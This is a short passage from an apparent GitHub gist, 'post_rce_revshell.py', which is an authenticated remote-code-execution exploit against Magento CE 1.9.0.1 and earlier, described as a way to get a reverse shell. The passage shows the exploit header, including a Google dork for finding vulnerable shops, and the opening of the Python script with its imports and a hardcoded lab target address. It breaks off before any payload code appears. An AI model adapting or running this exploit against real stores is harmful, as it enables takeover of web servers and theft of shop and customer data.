falcononrails
/ post_rce_revshell.py
Last active
December 27, 2023 13:06
Post Auth Magento RCE for reverse shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Exploit Title: Magento CE < 1.9.0.1 Post Auth RCE | |
| # Google Dork: "Powered by Magento" | |
| # Date: 08/18/2015 | |
| # Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com | |
| # Vendor Homepage: http://magento.com/ | |
| # Software Link: https://www.magentocommerce.com/download | |
| # Version: 1.9.0.1 and below | |
| # Tested on: Ubuntu 15 | |
| # CVE : none |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import base64 | |
| import sys | |
| target = "http://10.10.10.140/index.php" | |
| if not target.startswith("http"): | |
| target = "http://" + target | |
| if target.endswith("/"): |